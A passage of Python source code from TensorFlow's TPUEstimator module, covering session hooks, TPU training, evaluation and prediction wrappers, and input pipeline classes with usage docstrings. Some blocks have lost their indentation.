      pos += len(self._tensors[name])

    # It is assumed evaluation always happens on single host TPU system. So,
    # place all ops on tpu host if possible.
    #
    # TODO(jhseu): Evaluate whether this is right for summaries.
    with ops.device(self._ctx.tpu_host_placement_function(core_id=0)):
      for name in self._names:
        dequeue_ops = dequeue_ops_by_name[name]
        for i, item in enumerate(dequeue_ops):
          if dequeue_ops[i][0].shape.ndims == 0:
            raise RuntimeError(
                'All tensors outfed from TPU should preserve batch size '
                'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
          # TODO(xiejw): Allow users to specify the axis for batch size
          # dimension.
          dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)

        if self._tensor_keys[name] is not None:
          # The user-provided eval_metrics[1] is a dict.
          dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
          try:
            ret[name] = self._host_fns[name](**dequeue_ops)
          except TypeError as e:
            logging.warning(
                'Exception while calling %s: %s. It is likely the tensors '
                '(%s[1]) do not match the '
                'function\'s arguments', name, e, name)
            raise e
        else:
          ret[name] = self._host_fns[name](*dequeue_ops)

    return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
  """Hook to run host calls when use_tpu=False."""

  def __init__(self, tensors):
    self._tensors = tensors

  def begin(self):
    # We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
    # create a separate hook to guarantee execution order, because summaries
    # need to be initialized before the outfeed thread starts.
    # TODO(jhseu): Make a wrapper hook instead?
    self._init_ops = contrib_summary.summary_writer_initializer_op()
    # Collect the writer resources created by the initializer ops, so they
    # can be flushed when the session ends.
    self._finalize_ops = [
        contrib_summary.flush(writer=op.inputs[0]) for op in self._init_ops
    ]

  def after_create_session(self, session, coord):
    session.run(self._init_ops)

  def before_run(self, run_context):
    return basic_session_run_hooks.SessionRunArgs(self._tensors)

  def end(self, session):
    session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
  """Counts examples processed per second during runtime."""

  def __init__(self,
               batch_size,
               every_n_steps=100,
               every_n_secs=None,
               output_dir=None,
               summary_writer=None):
    # The global batch size used to convert a step rate into an example rate.
    self._batch_size = batch_size
    super(ExamplesPerSecondHook, self).__init__(
        every_n_steps=every_n_steps,
        every_n_secs=every_n_secs,
        output_dir=output_dir,
        summary_writer=summary_writer)

  def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
    examples_per_sec = self._batch_size * elapsed_steps / elapsed_time
    if self._summary_writer is not None:
      self._summary_writer.add_summary(
          Summary(value=[
              Summary.Value(tag='examples_sec', simple_value=examples_per_sec)
          ]), global_step)
    logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
  """Change SIGINT (CTRL^C) handler to force quit the process.

  The default behavior often results in hanging processes.
  The original handler is restored after training/evaluation.
  """

  def __init__(self):
    # Remember the handler that is currently installed so it can be restored.
    self._saved_sigint_handler = signal.getsignal(signal.SIGINT)

  def before_run(self, run_context):
    # Use the OS default (immediate termination) while the session runs.
    signal.signal(signal.SIGINT, signal.SIG_DFL)

  def end(self, session):
    # Restore the handler that was active before this hook took over.
    signal.signal(signal.SIGINT, self._saved_sigint_handler)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker).
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.metrics.accuracy(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
Exporting `SavedModel` support on TPU is not yet implemented. So,
`export_savedmodel` is executed on CPU, even if `use_tpu` is true.
"""
def __init__(self,
             model_fn=None,
             model_dir=None,
             config=None,
             params=None,
             use_tpu=True,
             train_batch_size=None,
             eval_batch_size=None,
             predict_batch_size=None,
             batch_axis=None):
  """Constructs a `TPUEstimator` instance.

  Args:
    model_fn: Model function as required by `Estimator`. For training, the
      returned `EstimatorSpec` cannot have hooks as it is not supported in
      `TPUEstimator`.
    model_dir: Directory to save model parameters, graph and etc. This can
      also be used to load checkpoints from the directory into an estimator
      to continue training a previously saved model. If `None`, the
      model_dir in `config` will be used if set. If both are set, they must
      be same. If both are `None`, a temporary directory will be used.
    config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
    params: An optional `dict` of hyper parameters that will be passed into
      `input_fn` and `model_fn`. Keys are names of parameters, values are
      basic python types. There are reserved keys for `TPUEstimator`,
      including 'batch_size'.
    use_tpu: A bool indicating whether TPU support is enabled. Currently,
      - TPU training and evaluation respect this bit.
      - Predict still happens on CPU.
    train_batch_size: An int representing the global training batch size.
      TPUEstimator transforms this global batch size to a per-shard batch
      size, as params['batch_size'], when calling `input_fn` and `model_fn`.
      Cannot be `None` if `use_tpu` is `True`.
      Must be divisible by total number of replicas.
    eval_batch_size: An int representing evaluation batch size.
      Must be divisible by total number of replicas.
    predict_batch_size: An int representing the prediction batch size.
      Must be divisible by total number of replicas.
    batch_axis: A python tuple of int values describing how each tensor
      produced by the Estimator `input_fn` should be split across the TPU
      compute shards. For example, if your input_fn produced (images, labels)
      where the images tensor is in `HWCN` format, your shard dimensions
      would be [3, 0], where 3 corresponds to the `N` dimension of your
      images Tensor, and 0 corresponds to the dimension along which to split
      the labels to match up with the corresponding images. If None is
      supplied, and per_host_input_for_training is True, batches will be
      sharded based on the major dimension. If
      tpu_config.per_host_input_for_training is False or `PER_HOST_V2`,
      batch_axis is ignored.

  Raises:
    ValueError: `params` has reserved keys already.
  """
  if config is None or not isinstance(config, tpu_config.RunConfig):
    raise ValueError(
        '`config` must be provided with type `tpu_config.RunConfig`')

  if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
    raise ValueError('{} are reserved keys but existed in params {}.'.format(
        _RESERVED_PARAMS_KEYS, params))

  if use_tpu:
    # Perform some very basic validations. More validations will be found in
    # _TPUContext.
    if train_batch_size is None:
      raise ValueError('`train_batch_size` cannot be `None`')
    util_lib.check_positive_integer(train_batch_size, 'train_batch_size')

    if (config.tpu_config.per_host_input_for_training is
        tpu_config.InputPipelineConfig.PER_SHARD_V1 and
        config.tpu_config.computation_shape):
      raise ValueError(
          'Model parallelism only supports per host input for training. '
          'Please adjust TPURunconfig.per_host_input_for_training.')

    if eval_batch_size is not None:
      util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')

    if predict_batch_size is not None:
      util_lib.check_positive_integer(predict_batch_size,
                                      'predict_batch_size')

  # Verifies the model_fn signature according to Estimator framework.
  estimator_lib._verify_model_fn_args(model_fn, params)  # pylint: disable=protected-access
  # We cannot store config and params in this constructor as parent
  # constructor might change them, such as assigning a temp dir for
  # config.model_dir.
  model_function = self._augment_model_fn(model_fn, batch_axis)

  # Passing non-None params as wrapped model_fn has it.
  params = params or {}
  super(TPUEstimator, self).__init__(
      model_fn=model_function,
      model_dir=model_dir,
      config=config,
      params=params)
  self._iterations_per_training_loop = (
      self._config.tpu_config.iterations_per_loop)

  # All properties passed to _TPUContext are immutable.
  # pylint: disable=protected-access
  self._ctx = tpu_context._get_tpu_context(
      self._config, train_batch_size,
      eval_batch_size, predict_batch_size,
      use_tpu)

  # Set by _call_input_fn to detect whether input_fn was actually invoked.
  self._is_input_fn_invoked = None
def _create_global_step(self, graph):
  """Build a global step tensor that is usable on TPU devices.

  Args:
    graph: The graph in which to create the global step.

  Returns:
    A global step `Tensor`.

  Raises:
    ValueError: if the global step tensor is already defined.
  """
  # Delegate to the module-level helper of the same name, which knows how
  # to construct a TPU-compatible global step.
  return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
  """Translate `steps`/`max_steps` into the hooks used for TPU training."""
  with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as train_ctx:
    if train_ctx.is_running_on_cpu():
      # CPU fallback: defer entirely to the base Estimator behaviour.
      return super(TPUEstimator, self)._convert_train_steps_to_hooks(
          steps, max_steps)

    # On TPU, at least one of the two stopping criteria is required.
    if steps is None and max_steps is None:
      raise ValueError(
          'For TPU training, one of `steps` or `max_steps` must be set. '
          'Cannot be both `None`.')

    # Estimator.train has explicit positiveness check.
    for value, label in ((steps, 'Train steps'),
                         (max_steps, 'Train max_steps')):
      if value is not None:
        util_lib.check_positive_integer(value, label)

    return [
        _TPUStopAtStepHook(
            self._iterations_per_training_loop, steps, max_steps)
    ]
def _convert_eval_steps_to_hooks(self, steps):
  """Translate an evaluation `steps` count into TPU evaluation hooks."""
  with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as eval_ctx:
    if eval_ctx.is_running_on_cpu():
      # CPU fallback: plain Estimator behaviour applies.
      return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)

    if steps is None:
      raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
    util_lib.check_positive_integer(steps, 'Eval steps')

    # One hook stops after N evals; the other tells the TPU evaluation loop
    # how many iterations to run.
    stop_hook = evaluation._StopAfterNEvalsHook(  # pylint: disable=protected-access
        num_evals=steps)
    return [stop_hook, _SetEvalIterationsHook(steps)]
def _call_input_fn(self, input_fn, mode):
  """Invokes `input_fn`, injecting the TPU-specific arguments.

  Args:
    input_fn: The input function.
    mode: ModeKeys

  Returns:
    Either features or (features, labels) where features and labels are:
      features - `Tensor` or dictionary of string feature name to `Tensor`.
      labels - `Tensor` or dictionary of `Tensor` with labels.

  Raises:
    ValueError: if input_fn takes invalid arguments or does not have `params`.
  """
  accepted_args = util.fn_args(input_fn)
  config = self.config  # a deep copy.
  if 'params' not in accepted_args:
    raise ValueError('input_fn ({}) does not include params argument, '
                     'required by TPUEstimator to pass batch size as '
                     'params["batch_size"]'.format(input_fn))

  kwargs = {'params': self.params}  # self.params is a deep copy.
  if 'config' in accepted_args:
    kwargs['config'] = config
  if 'mode' in accepted_args:
    kwargs['mode'] = mode

  # Records the fact input_fn has been invoked.
  self._is_input_fn_invoked = True

  with self._ctx.with_mode(mode) as ctx:
    # Setting the batch size in params first. This helps user to have same
    # input_fn for use_tpu=True/False.
    per_call_batch_size = ctx.batch_size_for_input_fn
    if per_call_batch_size is not None:
      kwargs['params'][_BATCH_SIZE_KEY] = per_call_batch_size

    # For export_savedmodel, input_fn is never passed to Estimator. So,
    # `is_export_mode` must be False.
    if ctx.is_running_on_cpu(is_export_mode=False):
      with ops.device('/device:CPU:0'):
        return input_fn(**kwargs)

    # On TPU the input pipeline must be built inside a tf.while_loop for
    # performance, so the call is deferred: hand back a zero-argument
    # closure. The model_fn wrapper invokes it while recording the input
    # structure (dict keys, shapes, dtypes) needed to build the infeed
    # dequeue ops. Here `input_fn` travels through the `features` slot of
    # the `model_fn` signature.
    def _deferred_input_fn():
      return input_fn(**kwargs)

    return _deferred_input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def _augment_model_fn(self, model_fn, batch_axis):
  """Returns a new model_fn, which wraps the TPU support."""

  def _model_fn(features, labels, mode, config, params):
    """A Estimator `model_fn` for TPUEstimator."""
    with self._ctx.with_mode(mode) as ctx:
      model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)

      # Decide whether this PREDICT call is export_savedmodel or .predict.
      if mode != model_fn_lib.ModeKeys.PREDICT:
        is_export_mode = False
      else:
        # For export_savedmodel, input_fn is never passed to Estimator. So, by
        # checking the self._is_input_fn_invoked bit, we can know, given the
        # mode == PREDICT, it is the .predict API, not export_savedmodel API.
        if self._is_input_fn_invoked:
          is_export_mode = False
        else:
          is_export_mode = True

      # Clear the bit.
      self._is_input_fn_invoked = None

      if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
        logging.info('Running %s on CPU', mode)
        return model_fn_wrapper.call_without_tpu(
            features, labels, is_export_mode=is_export_mode)

      assert labels is None, '`labels` passed to `model_fn` must be `None`.'
      # TPUEstimator._call_input_fn passes `input_fn` as features to here.
      assert callable(features), '`input_fn` is not callable.'
      input_fn = features

      # Build the infeed/outfeed pipeline around the deferred input_fn.
      input_holders = _InputPipeline(input_fn, batch_axis, ctx)
      enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
          input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())

      if mode == model_fn_lib.ModeKeys.TRAIN:
        loss, host_call, scaffold = (
            _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
        host_ops = host_call.create_tpu_hostcall()
        if host_ops is None:
          host_ops = []
        hooks = [
            TPUInfeedOutfeedSessionHook(
                ctx,
                enqueue_ops,
                host_ops,
                run_infeed_loop_on_coordinator=(
                    run_infeed_loop_on_coordinator)),
            ExamplesPerSecondHook(ctx.global_batch_size,
                                  output_dir=self.model_dir),
            InstallSignalHandlerHook(),
            training.LoggingTensorHook(
                {
                    'loss': array_ops.identity(loss),
                    'step': training.get_global_step()
                },
                every_n_secs=30)
        ] + input_hooks
        summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
        # Make the train_op wait for variable reads to sync back from TPU.
        with ops.control_dependencies([loss]):
          update_ops = _sync_variables_ops()

        # Validate the TPU training graph to catch basic errors
        _validate_tpu_training_graph()

        return model_fn_lib.EstimatorSpec(
            mode,
            loss=loss,
            training_hooks=hooks,
            train_op=control_flow_ops.group(*update_ops),
            scaffold=scaffold)

      if mode == model_fn_lib.ModeKeys.EVAL:
        total_loss, host_calls, scaffold = _eval_on_tpu_system(
            ctx, model_fn_wrapper, dequeue_fn)
        iterations_per_loop_var = _create_or_get_iterations_per_loop()
        # total_loss is accumulated over iterations_per_loop steps; report
        # the per-step mean.
        mean_loss = math_ops.div(total_loss,
                                 math_ops.cast(
                                     iterations_per_loop_var,
                                     dtype=total_loss.dtype))

        # Creates a dummy metric update_op for all metrics. Estimator expects
        # all metrics in eval_metric_ops have update_op and calls them one by
        # one. The real metric update_ops are invoked in a separated thread.
        # So, here give Estimator the dummy op for all metrics.
        with ops.control_dependencies([mean_loss]):
          # After TPU evaluation computation is done (the mean_loss tensor),
          # reads all variables back from TPU and updates the eval step
          # counter properly
          internal_ops_to_run = _sync_variables_ops()
          internal_ops_to_run.append(
              _increase_eval_step_op(iterations_per_loop_var))
          with ops.control_dependencies(internal_ops_to_run):
            dummy_update_op = control_flow_ops.no_op()

        host_call_ret = host_calls.create_tpu_hostcall()
        eval_metric_ops = {}
        eval_update_ops = []
        for k, v in host_call_ret['eval_metrics'].items():
          eval_metric_ops[k] = (v[0], dummy_update_op)
          eval_update_ops.append(v[1])

        if 'host_call' not in host_call_ret:
          host_ops = []
        else:
          host_ops = host_call_ret['host_call']
        hooks = [
            TPUInfeedOutfeedSessionHook(
                ctx,
                enqueue_ops,
                eval_update_ops + host_ops,
                run_infeed_loop_on_coordinator=(
                    run_infeed_loop_on_coordinator)),
        ] + input_hooks

        return model_fn_lib.EstimatorSpec(
            mode,
            loss=mean_loss,
            evaluation_hooks=hooks,
            eval_metric_ops=eval_metric_ops,
            scaffold=scaffold)

      # Predict
      assert mode == model_fn_lib.ModeKeys.PREDICT

      dummy_predict_op, host_calls, scaffold = _predict_on_tpu_system(
          ctx, model_fn_wrapper, dequeue_fn)
      with ops.control_dependencies([dummy_predict_op]):
        internal_ops_to_run = _sync_variables_ops()
        with ops.control_dependencies(internal_ops_to_run):
          dummy_predict_op = control_flow_ops.no_op()

      # In train and evaluation, the main TPU program is passed to monitored
      # training session to run. Infeed enqueue and outfeed dequeue are
      # executed in side threads. This is not the configuration for
      # prediction mode.
      #
      # For prediction, the Estimator executes the EstimatorSpec.predictions
      # directly and yield the element (via generator) to call site. So, the
      # outfeed based prediction must be passed to MonitoredSession directly.
      # Other parts of the TPU execution are organized as follows.
      #
      # 1. All outfeed based Tensors must be grouped with predictions Tensors
      #    to form a single invocation. This avoid the issue we might trigger
      #    multiple outfeeds incorrectly. To achieve this, `host_call` is
      #    placed in control_dependencies of `stopping_signals`, and
      #    `stopping_signals` is passed into _StoppingPredictHook, which sets
      #    the `stopping_signals` as SessionRunArgs. MonitoredSession merges
      #    all SessionRunArgs with the fetch in session.run together.
      #
      # 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
      #    are grouped together. They will be launched once and only once in
      #    side threads and they quit naturally according to the SAME stopping
      #    condition.
      enqueue_ops.append(dummy_predict_op)

      host_call_ret = host_calls.create_tpu_hostcall()
      if 'host_call' not in host_call_ret:
        host_ops = []
      else:
        host_ops = host_call_ret['host_call']

      predictions = host_call_ret['predictions']
      _verify_cross_hosts_transfer_size(
          predictions, message=(
              'The estimated size for TPUEstimatorSpec.predictions is too '
              'large.'))
      signals = host_call_ret['signals']

      with ops.control_dependencies(host_ops):
        host_ops = []  # Empty, we do not need it anymore.
        scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
            signals)
        # Drop padded rows before handing predictions back to the user.
        predictions = _PaddingSignals.slice_tensor_or_dict(
            predictions, signals)

      hooks = [
          _StoppingPredictHook(scalar_stopping_signal),
          TPUInfeedOutfeedSessionHookForPrediction(ctx, enqueue_ops,
                                                   host_ops),
      ] + input_hooks

      return model_fn_lib.EstimatorSpec(
          mode,
          prediction_hooks=hooks,
          predictions=predictions,
          scaffold=scaffold)

  return _model_fn
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
  """Executes `model_fn_wrapper` multiple times on all TPU shards."""
  iterations_var = _create_or_get_iterations_per_loop()
  single_tpu_eval_step, host_calls, captured_scaffold_fn = (
      model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn))

  def _repeated_eval_steps():
    # Run `iterations_var` eval steps per TPU loop, threading the loss
    # accumulator through iterations.
    return training_loop.repeat(
        iterations_var, single_tpu_eval_step, [_ZERO_LOSS])

  (loss,) = tpu.shard(
      _repeated_eval_steps,
      inputs=[],
      num_shards=ctx.num_replicas,
      outputs_from_all_shards=False,
      device_assignment=ctx.device_assignment)

  return loss, host_calls, _get_scaffold(captured_scaffold_fn)
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
  """Executes `model_fn_wrapper` multiple times on all TPU shards."""
  iterations_var = _create_or_get_iterations_per_loop()
  single_tpu_train_step, host_call, captured_scaffold_fn = (
      model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))

  def _repeated_train_steps():
    # Run `iterations_var` train steps per TPU loop, threading the loss
    # through iterations.
    return training_loop.repeat(
        iterations_var, single_tpu_train_step, [_INITIAL_LOSS])

  (loss,) = tpu.shard(
      _repeated_train_steps,
      inputs=[],
      num_shards=ctx.num_replicas,
      outputs_from_all_shards=False,
      device_assignment=ctx.device_assignment)

  return loss, host_call, _get_scaffold(captured_scaffold_fn)
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
  """Executes `model_fn_wrapper` multiple times on all TPU shards."""
  num_cores = ctx.num_cores
  single_tpu_predict_step, host_calls, captured_scaffold_fn = (
      model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn))

  def _predict_until_stopped():
    def _keep_going(scalar_stopping_signal):
      # Continue looping while the stopping signal has not fired.
      return math_ops.logical_not(
          _StopSignals.should_stop(scalar_stopping_signal))

    return training_loop.while_loop(
        _keep_going,
        single_tpu_predict_step,
        inputs=[_StopSignals.NON_STOPPING_SIGNAL],
        name=b'loop')

  (dummy_predict_op,) = tpu.shard(
      _predict_until_stopped,
      inputs=[],
      num_shards=num_cores,
      outputs_from_all_shards=False)

  return dummy_predict_op, host_calls, _get_scaffold(captured_scaffold_fn)
def _wrap_computation_in_while_loop(device, op_fn):
  """Wraps the ops generated by `op_fn` in tf.while_loop."""

  def _body(step):
    # Re-run `op_fn` each iteration; its ops must complete before the
    # counter advances.
    with ops.control_dependencies(op_fn()):
      return step + 1

  iterations_per_loop_var = _create_or_get_iterations_per_loop()
  with ops.device(device):
    iterations = array_ops.identity(iterations_per_loop_var)
    # parallel_iterations=1 effectively disables the parallel execution
    # normally performed inside while_loop.
    return control_flow_ops.while_loop(
        lambda step: step < iterations,
        _body, [constant_op.constant(0)],
        parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
  """Wraps the ops generated by `op_fn` in tf.while_loop."""

  def _keep_going(scalar_stopping_signal):
    return math_ops.logical_not(
        _StopSignals.should_stop(scalar_stopping_signal))

  def _body(unused_scalar_stopping_signal):
    step_result = op_fn()
    execute_ops = step_result['ops']
    signals = step_result['signals']
    # The step's ops must run before the next stopping signal is produced.
    with ops.control_dependencies(execute_ops):
      return _StopSignals.as_scalar_stopping_signal(signals)

  # parallel_iterations=1 effectively disables the parallel execution
  # normally performed inside while_loop.
  with ops.device(device):
    return control_flow_ops.while_loop(
        _keep_going,
        _body, [_StopSignals.NON_STOPPING_SIGNAL],
        parallel_iterations=1)
def _validate_tpu_training_graph():
  """Validate graph before running distributed training.

  Raises:
    ValueError: If the graph seems invalid for running on device
  """
  graph_ops = ops.get_default_graph().get_operations()
  # A CrossReplicaSum op is introduced by wrapping the optimizer in
  # CrossShardOptimizer; its absence means gradients would not be
  # aggregated across TPU shards.
  if not any(op.type == _CROSS_REPLICA_SUM_OP for op in graph_ops):
    raise ValueError(
        'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can be captured only. Please file bug .')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug .')
return self._object
def _get_scaffold(captured_scaffold_fn):
  """Retrieves the Scaffold from `captured_scaffold_fn`."""
  with _CapturingContext(message='Inside scaffold_fn'):
    scaffold_fn = captured_scaffold_fn.get()
    if not scaffold_fn:
      scaffold = None
    else:
      scaffold = scaffold_fn()
      if scaffold is None:
        raise ValueError(
            'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')

  if scaffold:
    wrapped_finalize = scaffold.finalize

    def _finalize():
      # Track illegal TPU-tensor references during finalize as well.
      with _CapturingContext('Inside Scaffold.finalize'):
        wrapped_finalize()

    scaffold.finalize = _finalize
  return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
  """Tracks references to Tensors defined in TPU replication."""

  def __init__(self, message):
    control_flow_ops.ControlFlowContext.__init__(self)
    # Prefix used in the error raised when an illegal reference is found.
    self._message = message

  def AddOp(self, op):  # pylint: disable=invalid-name
    """Rejects any op whose inputs come from the TPU-replicated subgraph."""
    for tensor in op.inputs:
      if tpu._TPU_REPLICATE_ATTR in tensor.op.node_def.attr:  # pylint: disable=protected-access
        raise ValueError('{}: Op {} depends on TPU computation {}, '
                         'which is not allowed.'.format(
                             self._message, op, tensor))

  def __enter__(self):
    # Install this context on the default graph so AddOp sees every new op.
    # pylint: disable=protected-access
    self._g = ops.get_default_graph()
    self._old = self._g._get_control_flow_context()
    self._g._set_control_flow_context(self)
    # pylint: enable=protected-access

  def __exit__(self, _, __, ___):  # pylint: disable=invalid-name
    # Restore the previously active control flow context.
    self._g._set_control_flow_context(self._old)  # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer_hook(self):
"""Returns a `SessionRunHook` to initialize this dataset.
This must be called before `features_and_labels`.
"""
iterator = self._dataset.make_initializable_iterator()
# pylint: disable=protected-access
hook = estimator_lib._DatasetInitializerHook(iterator)
self._iterator = iterator
return hook
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must call dataset_initializer_hook '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
  """Inputs with `_StopSignals` inserted into the dataset."""

  def __init__(self, dataset, batch_size, add_padding=False):
    assert dataset is not None

    # Tag every user batch with a non-stop signal, then append one extra
    # batch (a copy of the first) carrying the stop signal.
    user_provided_dataset = dataset.map(
        _InputsWithStoppingSignals.insert_stopping_signal(
            stop=False, batch_size=batch_size, add_padding=add_padding))
    final_batch_dataset = dataset.take(1).map(
        _InputsWithStoppingSignals.insert_stopping_signal(
            stop=True, batch_size=batch_size, add_padding=add_padding))
    dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)

    super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
    self._current_inputs = None

  def features_and_labels(self):
    if self._current_inputs is not None:
      raise RuntimeError(
          'Internal Error: The previous inputs have not been properly '
          'consumed. First call features_and_labels, then call signals.')

    next_inputs = self._iterator.get_next()
    self._current_inputs = next_inputs
    return next_inputs['features'], next_inputs.get('labels')

  def signals(self):
    """Returns the `Signals` from `_Inputs`."""
    if self._current_inputs is None:
      raise RuntimeError(
          'Internal Error: The current inputs have not been properly '
          'generated. First call features_and_labels, then call signals.')
    stored_signals = self._current_inputs['signals']
    self._current_inputs = None
    return stored_signals

  @staticmethod
  def insert_stopping_signal(stop, batch_size, add_padding=False):
    """Inserts stopping_signal into dataset via _map_fn.

    Here we change the data structure in the dataset, such that the return value
